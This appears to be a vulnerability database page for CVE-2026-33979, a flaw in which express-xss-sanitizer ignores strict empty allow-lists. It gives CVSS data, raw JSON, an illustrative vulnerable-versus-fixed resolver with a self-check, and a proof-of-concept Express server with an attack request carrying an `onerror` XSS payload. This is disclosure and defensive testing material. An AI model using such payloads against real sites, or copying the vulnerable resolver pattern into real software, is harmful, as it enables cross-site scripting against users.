Security Vulnerability Report
CVE-2026-33979 CVSS 8.2 HIGH

CVE-2026-33979

Published: 2026-03-27 22:16:22
Last Modified: 2026-03-31 18:24:59

Description

Express XSS Sanitizer is Express 4.x and 5.x middleware that sanitizes user input data (in req.body, req.query, req.headers and req.params) to prevent Cross Site Scripting (XSS) attacks. A vulnerability has been identified in versions prior to 2.0.2 where restrictive sanitization configurations are silently ignored. In version 2.0.2, the validation logic has been updated to respect explicitly provided empty configurations: if allowedTags or allowedAttributes are provided (even if empty), they are now passed directly to sanitize-html without being overridden.
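The failure mode in the description, a permissive default silently replacing an explicitly empty allow-list, is the general pattern behind CWE-183 (listed in the raw data below). The following is an added illustration of that pattern, not express-xss-sanitizer's own source and not a reproduction of its internals: resolveOptionsVulnerable is a hypothetical option resolver that picks the defaults whenever the caller's list is empty, resolveOptionsFixed is the same resolver deciding on key presence instead, sanitizeWith is a deliberately tiny tag filter that exists only to make the configuration's effect observable offline, and strictConfigIsHonoured is the self-check a deployer would want: with an empty allow-list, a constructed probe must come back with no markup at all. The default tag and attribute lists are constructed and stand in for sanitize-html's real ones.

```javascript
// Added illustration for the CVE-2026-33979 failure mode (CWE-183).
// NOT the express-xss-sanitizer source; the resolvers below are hypothetical
// stand-ins for the pattern the advisory describes. Defaults are constructed.
const DEFAULT_ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'a', 'img'];
const DEFAULT_ALLOWED_ATTRIBUTES = { a: ['href'], img: ['src'] };

// Vulnerable pattern: "use the caller's list if it is non-empty, else the
// defaults". An explicitly empty allow-list has length 0 and is silently
// replaced by the permissive defaults, the opposite of what the caller asked.
function resolveOptionsVulnerable(userOptions = {}) {
  const tags = userOptions.allowedTags;
  const attrs = userOptions.allowedAttributes;
  return {
    allowedTags: Array.isArray(tags) && tags.length ? tags : DEFAULT_ALLOWED_TAGS,
    allowedAttributes: attrs && Object.keys(attrs).length ? attrs : DEFAULT_ALLOWED_ATTRIBUTES,
  };
}

// Fixed pattern: presence, not truthiness or length, decides. If the key was
// supplied at all (even as [] or {}), pass it through untouched.
function resolveOptionsFixed(userOptions = {}) {
  const has = (k) =>
    Object.prototype.hasOwnProperty.call(userOptions, k) && userOptions[k] !== undefined;
  return {
    allowedTags: has('allowedTags') ? userOptions.allowedTags : DEFAULT_ALLOWED_TAGS,
    allowedAttributes: has('allowedAttributes') ? userOptions.allowedAttributes : DEFAULT_ALLOWED_ATTRIBUTES,
  };
}

// Minimal stand-in "sanitizer": drops any tag not in allowedTags and any
// attribute not allowed for a kept tag. It only makes the resolved config's
// effect visible; it is not a real HTML sanitizer and must not be used as one.
function sanitizeWith(resolved, html) {
  return html.replace(/<\/?([a-z][a-z0-9]*)\b([^>]*)>/gi, (whole, name, rawAttrs) => {
    const tag = name.toLowerCase();
    if (!resolved.allowedTags.includes(tag)) return '';
    if (whole.startsWith('</')) return `</${tag}>`;
    const allowed = resolved.allowedAttributes[tag] || [];
    const kept = [];
    const attrRe = /([a-z][a-z0-9-]*)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/gi;
    let m;
    while ((m = attrRe.exec(rawAttrs)) !== null) {
      if (allowed.includes(m[1].toLowerCase())) {
        kept.push(m[2] === undefined ? m[1] : `${m[1]}=${m[2]}`);
      }
    }
    return `<${tag}${kept.length ? ' ' + kept.join(' ') : ''}>`;
  });
}

// Deployment self-check: ask for "no tags, no attributes" and verify that a
// constructed probe really comes back with no markup. Returns true only when
// the resolver honoured the strict configuration.
function strictConfigIsHonoured(resolve) {
  const resolved = resolve({ allowedTags: [], allowedAttributes: {} });
  const probe = '<img src=x onerror=alert(1)>hello<b>world</b>'; // constructed input
  const out = sanitizeWith(resolved, probe);
  return !/<[a-z]/i.test(out);
}
```

Run strictConfigIsHonoured against whatever wraps your sanitizer's option handling: it reports false for the vulnerable resolver (the probe comes back as `<img src=x>hello<b>world</b>` because the defaults were substituted) and true for the fixed one (`helloworld`). The same check, pointed at the real middleware in a test suite, is the cheapest way to notice that a "strict" configuration is not actually in force.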

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:express_xss_sanitizer_project:express_xss_sanitizer:*:*:*:*:*:node.js:*:* - VULNERABLE
Express XSS Sanitizer < 2.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
/*
 * PoC for CVE-2026-33979
 * This demonstrates how the empty allowedTags configuration is ignored in vulnerable versions.
 */
const express = require('express');
// Version < 2.0.2. The package exports an object ({ xss, sanitize }), so the
// middleware factory is the named export.
const { xss } = require('express-xss-sanitizer');

const app = express();
app.use(express.json());

// Intended configuration: allow NO tags (strict sanitization).
// Vulnerability: this config is silently ignored, allowing the default tags.
app.use(xss({ allowedTags: [], allowedAttributes: {} }));

app.post('/api/comment', (req, res) => {
  // Input should be sanitized to plain text, but HTML tags may persist
  const userInput = req.body.comment;
  res.send({ result: userInput });
});

app.listen(3000, () => {
  console.log('Server running on port 3000');
});

/*
 * Attack Request:
 * POST /api/comment HTTP/1.1
 * Host: localhost:3000
 * Content-Type: application/json
 *
 * {
 *   "comment": "<img src=x onerror=alert('XSS')>"
 * }
 *
 * Expected Result (Safe, 2.0.2 and later): the <img> tag is removed by sanitize-html, since no tags are allowed.
 * Actual Result (Vulnerable): the <img> tag is returned unescaped or partially allowed, triggering the alert.
 */

References

https://github.com/AhmedAdelFahim/express-xss-sanitizer/commit/5623009ef11dcf095c163a38dea07b9cc22ad19f (Patch)
https://github.com/AhmedAdelFahim/express-xss-sanitizer/releases/tag/v2.0.2 (Product, Release Notes)
https://github.com/AhmedAdelFahim/express-xss-sanitizer/security/advisories/GHSA-3843-rr4g-m8jq (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33979",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-27T22:16:22.433",
    "lastModified": "2026-03-31T18:24:58.820",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Express XSS Sanitizer is Express 4.x and 5.x middleware which sanitizes user input data (in req.body, req.query, req.headers and req.params) to prevent Cross Site Scripting (XSS) attack. A vulnerability has been identified in versions prior to 2.0.2 where restrictive sanitization configurations are silently ignored. In version 2.0.2, the validation logic has been updated to respect explicitly provided empty configurations. Now, if allowedTags or allowedAttributes are provided (even if empty), they are passed directly to sanitize-html without being overridden."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-79" },
          { "lang": "en", "value": "CWE-183" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:express_xss_sanitizer_project:express_xss_sanitizer:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "2.0.2",
                "matchCriteriaId": "3BCCF0CB-E43F-4D70-A024-7EE81877DDC9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/AhmedAdelFahim/express-xss-sanitizer/commit/5623009ef11dcf095c163a38dea07b9cc22ad19f",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/AhmedAdelFahim/express-xss-sanitizer/releases/tag/v2.0.2",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/AhmedAdelFahim/express-xss-sanitizer/security/advisories/GHSA-3843-rr4g-m8jq",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}